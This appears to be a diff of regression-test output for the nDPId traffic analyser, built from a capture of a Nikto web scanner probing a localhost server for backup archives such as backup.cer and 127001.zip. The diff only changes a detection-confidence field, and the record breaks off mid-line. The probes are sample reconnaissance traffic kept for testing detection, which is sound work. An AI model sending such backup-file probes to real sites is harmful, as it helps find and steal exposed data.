00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1576420277036,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277036,"pkt":"AAAAAAAAAAAAAAAACABFAADCaYNAAEAG0rB\/AAABfwAAAcNgH5BETFHrIT\/7L4AYAED+tgAAAQEICp1m\/FSdZvxUR0VUIC9iYWNrdXAuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277036,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277036,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277037,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1576420277037,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277037,"pkt":"AAAAAAAAAAAAAAAACABFAADByHVAAEAGc79\/AAABfwAAAcNiH5AsIfAZ9PZ+lIAYAED+tQAAAQEICp1m\/FWdZvxVR0VUIC8xMjcwMC5jZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277037,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277037,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277040,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1576420277040,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277040,"pkt":"AAAAAAAAAAAAAAAACABFAADBLYNAAEAGDrJ\/AAABfwAAAcNkH5B8OhXu0\/0OtIAYAED+tQAAAQEICp1m\/FidZvxXR0VUIC8xMjcwMC5jZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277040,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277040,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277041,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1576420277041,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277041,"pkt":"AAAAAAAAAAAAAAAACABFAADJ0PZAAEAGazZ\/AAABfwAAAcNmH5D3m+iZ0R8Y8oAYAED+vQAAAQEICp1m\/FmdZvxZR0VUIC8xMjdfMF8wXzEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277041,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277041,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277042,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1576420277042,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277042,"pkt":"AAAAAAAAAAAAAAAACABFAADJPvJAAEAG\/Tp\/AAABfwAAAcNoH5CMHAadHXRwyoAYAED+vQAAAQEICp1m\/FqdZvxaR0VUIC8xMjdfMF8wXzEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277042,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277042,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277044,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1576420277044,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277044,"pkt":"AAAAAAAAAAAAAAAACABFAADCjwZAAEAGrS1\/AAABfwAAAcNqH5Br7rdq4TxVq4AYAED+tgAAAQEICp1m\/FydZvxcR0VUIC8xMjcwMDEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277044,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277044,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277045,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1576420277045,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277045,"pkt":"AAAAAAAAAAAAAAAACABFAADCv9RAAEAGfF9\/AAABfwAAAcNsH5AFEofAoVDNroAYAED+tgAAAQEICp1m\/F2dZvxdR0VUIC8xMjcwMDEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277045,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277045,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277046,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1576420277046,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277046,"pkt":"AAAAAAAAAAAAAAAACABFAADBTDZAAEAG7\/5\/AAABfwAAAcNuH5C8OnRaQfn7gYAYAED+tQAAAQEICp1m\/F6dZvxeR0VUIC8wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277046,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277046,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 